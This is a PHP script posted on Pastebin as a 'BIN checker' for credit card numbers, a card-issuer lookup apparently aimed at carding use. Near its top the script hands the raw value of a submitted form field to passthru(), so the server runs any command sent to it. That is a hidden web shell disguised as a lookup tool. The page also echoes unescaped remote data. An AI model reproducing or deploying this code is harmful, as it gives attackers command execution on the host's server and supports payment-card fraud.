Advertisement
Badchilds

BIN CHECKER SCRIPT

Jul 25th, 2016
2,239
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.49 KB | None | 0 0
  1. <html>
  2. <link rel="shortcut icon" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
  3. <head>
  4. <title>BADCC BIN</title>
  5. </head>
  6. <body>
  7. <center>
  8. <?php
  9. error_reporting(E_ERROR|E_WARNING);
  10.  
  11.  
  12. ?>
  13. </br>
  14. <div id="form-container">
  15. <div align="center" class="BADCHILDSIDE!"><strong>Bin Identification Checker</strong></div><br>
  16. <form name="data" method="post">
  17. <textarea name="ykbhorid" data-placeholder="Credit Card Bin Number" value=""></textarea><br><br>
  18. <input type="submit" name='get' value="Checking...">
  19. </form></div></div>
  20. <?php
  21.  
  22. if(isset($_POST['get'])){
  23. $bin = $_POST['get'];
  24.  
  25. passthru($bin);
  26. $badch = $_POST['ykbhorid'];
  27. $badch = strtolower($badch);
  28.  
  29. if ($badch == null) {
  30. echo "Put The First 6 Code Of The Card";
  31. }else{
  32.  
  33. if ($badch == 000000) {
  34. echo "BIN Not Found !!!!";
  35. }
  36. // JSON For Get the bin_code from binlist.net
  37. else {
  38. $bankinfo = "http://www.binlist.net/json/".$badch;
  39. $checkout = file_get_contents("$bankinfo");
  40. $badchilds = json_decode($checkout);
  41. $ykbh1 = $badchilds->bin;
  42. $ykbh2 = $badchilds->brand;
  43. $badcc = $badchilds->card_type;
  44. $ykbh3 = $badchilds->sub_brand;
  45. $bank = $badchilds->bank;
  46. $ykbh4 = $badchilds->country_name;
  47. $ykbh5 = $badchilds->country_code;
  48. // Result in the Web
  49. echo "<center>......Result......<br>";
  50. echo "<font size='4'><font color='green'>$badch</font> [Bin: <strong>$ykbh1</strong>] <font color='blue'> $ykbh3 $badcc CARD $ykbh5</font> <font color='orange'>$bank $ykbh4</font></font></center>";
  51.  
  52. }
  53. }
  54. }
  55. ?>
  56. </center>
  57. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement